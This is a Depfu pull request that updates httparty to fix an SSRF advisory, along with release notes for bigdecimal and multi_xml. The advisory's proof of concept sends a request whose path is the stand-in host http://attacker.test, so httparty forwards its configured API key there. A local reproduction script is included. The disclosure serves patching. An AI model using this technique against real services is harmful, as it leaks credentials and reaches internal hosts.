🚨 [security] Update httparty 0.23.2 → 0.24.0 (major)

[depfu]

---

🚨 Your current dependencies have known security vulnerabilities 🚨

This dependency update fixes known security vulnerabilities. Please see the details below and assess their impact carefully. We recommend to merge and deploy this as soon as possible!

---

Here is everything you need to know about this update. Please take a good look at what changed and the test results before merging this pull request.

What changed?

✳️ httparty (0.23.2 → 0.24.0) · Repo · Changelog

Security Advisories 🚨

🚨 httparty Has Potential SSRF Vulnerability That Leads to API Key Leakage

Summary

There may be an SSRF vulnerability in httparty. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers.

Details

When httparty receives a path argument that is an absolute URL, it ignores the base_uri field. As a result, if a malicious user can control the path value, the application may unintentionally communicate with a host that the programmer did not anticipate.

Consider the following example of a web application:

require 'sinatra'
require 'httparty'
class RepositoryClient

include HTTParty

base_uri 'http://exmaple.test/api/v1/repositories/'

headers 'X-API-KEY' => '1234567890'

end
post '/issue' do

request_body = JSON.parse(request.body.read)

RepositoryClient.get(request_body['repository_id']).body

# do something

json message: 'OK'

end

Now, suppose an attacker sends a request like this:

POST /issue HTTP/1.1
Host: localhost:10000
Content-Type: application/json
{

"repository_id": "http://attacker.test",

"title": "test"

}

In this case, httparty sends the X-API-KEY not to http://example.test but instead to http://attacker.test.

A similar problem was reported and fixed in the HTTP client library axios in the past:
axios/axios#6463

Also, Python's urljoin function has documented a warning about similar behavior:
https://docs.python.org/3.13/library/urllib.parse.html#urllib.parse.urljoin

PoC

Follow these steps to reproduce the issue:

1. Set up two simple HTTP servers.

   mkdir /tmp/server1 /tmp/server2
   echo "this is server1" > /tmp/server1/index.html 
   echo "this is server2" > /tmp/server2/index.html
   python -m http.server -d /tmp/server1 10001 &
   python -m http.server -d /tmp/server2 10002 &

2. Create a script (for example, main.rb):

   require 'httparty'
   class Client
   
   include HTTParty
   
   base_uri 'http://localhost:10001'
   
   end
   data = Client.get('http://localhost:10002').body
   
   puts data

3. Run the script:

   $ ruby main.rb
   this is server2

Although base_uri is set to http://localhost:10001/, httparty sends the request to http://localhost:10002/.

Impact

• Leakage of credentials: If an absolute URL is provided, any API keys or credentials configured in httparty may be exposed to unintended third-party hosts.
• SSRF (Server-Side Request Forgery): Attackers can force the httparty-based program to send requests to other internal hosts within the network where the program is running.
• Affected users: Any software that uses base_uri and does not properly validate the path parameter may be affected by this issue.

Commits

See the full diff on Github. The new version differs by 9 commits:

• Release 0.24.0
• Merge pull request #830 from jnunemaker/fix-ssrf-base-uri-bypass
• fix: prevent SSRF via absolute URL bypassing base_uri (GHSA-hm5p-x4rq-38w4)
• Merge pull request #829 from jnunemaker/memory
• feat: stream multipart file uploads to reduce memory usage
• Merge pull request #828 from jnunemaker/issue-826
• feat: set Content-Type for Hash body in requests
• Merge pull request #823 from jnunemaker/mixed-encodings
• Force binary encoding throughout

↗️ bigdecimal (indirect, 3.3.1 → 4.0.1) · Repo · Changelog

Release Notes

4.0.1

What's Changed

• Exclude dependabot updates from release note by @hsbt in #474
• Remove unused variable (and add test for it) by @tompng in #475
• Remove "Which version should you select" section by @tompng in #476
• Bump version to v4.0.1 by @tompng in #477

Full Changelog: v4.0.0...v4.0.1

4.0.0

What's Changed

• Fix x**y, x.power(y, 0) and x.sqrt(0) calculates huge digits if precision limit is huge by @tompng in #445
• Implement major math functions by @tompng in #336
• Fix fast-path of frac and _decimal_shift affected by BigDecimal.limit by @tompng in #447
• Update the latest versions of actions by @hsbt in #449
• Add missing bigmath precision test, add missing indent by @tompng in #450
• Make BigMath.exp and log also a module_method by @tompng in #452
• Fix incorrect exception when exponent is fractional for Infinity base by @troy-dunamu in #453
• Bump step-security/harden-runner from 2.13.1 to 2.13.2 by @dependabot[bot] in #454
• Don't use assert_separatly if not needed by @tompng in #455
• Bump actions/checkout from 5.0.0 to 6.0.0 by @dependabot[bot] in #456
• Bump actions/checkout from 5.0.1 to 6.0.0 by @dependabot[bot] in #457
• Add missing BigMath test for jruby by @tompng in #459
• Change remainder/modulo/divmod test of +0/-0 type tolerant by @tompng in #460
• Cast divmod quotient to int by @mrzasa in #312
• Bump actions/checkout from 6.0.0 to 6.0.1 by @dependabot[bot] in #462
• Bump step-security/harden-runner from 2.13.2 to 2.13.3 by @dependabot[bot] in #461
• Implement BigMath.erf(x, prec) and BigMath.erfc(x, prec) by @tompng in #357
• Implement BigMath.gamma and BigMath.lgamma by @tompng in #451
• Fix typos + improve copy/paste in readme by @tas50 in #463
• Fix inaccurate calculation (last digit) and add a workaround for add/sub hang bug by @tompng in #465
• Fix lgamma precision around 1 and 2 by @tompng in #466
• Fix lgamma precision when gamma(negative_x).abs nearly equals 1 by @tompng in #467
• Implement BigMath.frexp and ldexp with exponent of 10 by @tompng in #448
• Bump step-security/harden-runner from 2.13.3 to 2.14.0 by @dependabot[bot] in #468
• Better rounding of BigMath.atan(nearly_one, prec) by @tompng in #469
• Remove deprecated method BigDecimal#precs by @tompng in #470
• Deprecate ludcmp, jacobian and newton by @tompng in #471
• Bump version to v4.0.0 by @tompng in #472

New Contributors

• @troy-dunamu made their first contribution in #453
• @tas50 made their first contribution in #463

Full Changelog: v3.3.1...v4.0.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 40 commits:

• Bump version to v4.0.1 (#477)
• Remove "Which version should you select" section (#476)
• Remove unused variable (and add test for it) (#475)
• Merge pull request #474 from ruby/exclude-dependabot-update
• Exclude dependabot updates from release note
• Bump version to v4.0.0 (#472)
• Deprecate ludcmp, jacobian and newton (#471)
• Remove deprecated method BigDecimal#precs (#470)
• Better rounding of BigMath.atan(nearly_one, prec) (#469)
• Merge pull request #468 from ruby/dependabot/github_actions/step-security/harden-runner-2.14.0
• Bump step-security/harden-runner from 2.13.3 to 2.14.0
• Implement BigMath.frexp and ldexp with exponent of 10 (#448)
• Fix lgamma precision when gamma(negative_x).abs nearly equals 1 (#467)
• Fix lgamma precision around 1 and 2 (#466)
• Fix inaccurate calculation (last digit) and add a workaround for add/sub hang bug (#465)
• Merge pull request #463 from tas50/master
• Fix typos + improve copy/paste in readme
• Implement BigMath.gamma and BigMath.lgamma (#451)
• Implement BigMath.erf(x, prec) and BigMath.erfc(x, prec) (#357)
• Merge pull request #461 from ruby/dependabot/github_actions/step-security/harden-runner-2.13.3
• Merge pull request #462 from ruby/dependabot/github_actions/actions/checkout-6.0.1
• Bump actions/checkout from 6.0.0 to 6.0.1
• Bump step-security/harden-runner from 2.13.2 to 2.13.3
• Cast divmod quotient to int (#312)
• Change remainder/modulo/divmod test of +0/-0 type tolerant (#460)
• Add missing BigMath test for jruby (#459)
• Merge pull request #457 from ruby/dependabot/github_actions/actions/checkout-6.0.0
• Bump actions/checkout from 5.0.1 to 6.0.0
• Merge pull request #456 from ruby/dependabot/github_actions/actions/checkout-6.0.0
• Bump actions/checkout from 5.0.0 to 6.0.0
• Don't use assert_separatly if not needed (#455)
• Bump step-security/harden-runner from 2.13.1 to 2.13.2 (#454)
• Fix incorrect exception when exponent is fractional for Infinity base (#453)
• Make BigMath.exp and log also a module_method (#452)
• Add missing bigmath precision test, add missing indent (#450)
• Merge pull request #449 from ruby/update-actions
• Update the latest versions of actions
• Fix fast-path of frac and _decimal_shift affected by BigDecimal.limit (#447)
• Implement major math functions (#336)
• Fix x**y, x.power(y, 0) and x.sqrt(0) calculates huge digits if precision limit is huge (#445)

↗️ multi_xml (indirect, 0.7.2 → 0.8.0) · Repo · Changelog

Release Notes

0.8.0 (from changelog)

• Add per-parse :parser option to MultiXml.parse
• Add SAX parsers for Nokogiri and LibXML
• Fix inconsistent whitespace handling across parsers
• Make parsing errors inspectable with cause and xml accessors
• Drop support for JRuby

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 36 commits:

• Bump version to 0.8.0
• Add push workflow and update release rake task
• Document Ruby 4 support
• Refactor
• Remove test skips
• Increase branch coverage to 100%
• Fix tests on Windows
• Drop support for JRuby
• Add type checking with RBS and Steep
• More refactoring
• More test cleanup
• Kill remaining mutants
• Cleanup tests
• Kill mutants
• Suppress oga warnings
• Add mutant
• 100% c0 code coverage
• Covert from RSpec to Minitest
• 100% documentation coverage
• More refactoring
• Extract modules and constants into separate files
• Update workflows
• Extract global variables into SpeedTest module
• Replace @xml instance variables with let(:xml) declarations
• Refactor
• Refactor code into Helpers module
• rake standard:fix
• Make parsing errors inspectable with cause and xml accessors
• Fix inconsistent whitespace handling across parsers
• Fix constant lookup in parser require guards
• Add SAX parsers for Nokogiri and LibXML
• Change bigdecimal dependency to >= 3.1, < 5
• Revert "Pass symbol as an argument to proc instead of a block"
• Add per-parse :parser option to MultiXml.parse
• Pass symbol as an argument to proc instead of a block
• Update bigdecimal depdnency to ~> 4.0

---

Depfu will automatically keep this PR conflict-free, as long as you don't add any commits to this branch yourself. You can also trigger a rebase manually by commenting with @depfu rebase.

All Depfu comment commands

@​depfu rebase

Rebases against your default branch and redoes this update

@​depfu recreate

Recreates this PR, overwriting any edits that you've made to it

@​depfu merge

Merges this PR once your tests are passing and conflicts are resolved

@​depfu cancel merge

Cancels automatic merging of this PR

@​depfu close

Closes this PR and deletes the branch

@​depfu reopen

Restores the branch and reopens this PR (if it's closed)

@​depfu pause

Ignores all future updates for this dependency and closes this PR

@​depfu pause [minor|major]

Ignores all future minor/major updates for this dependency and closes this PR

@​depfu resume

Future versions of this dependency will create PRs again (leaves this PR as is)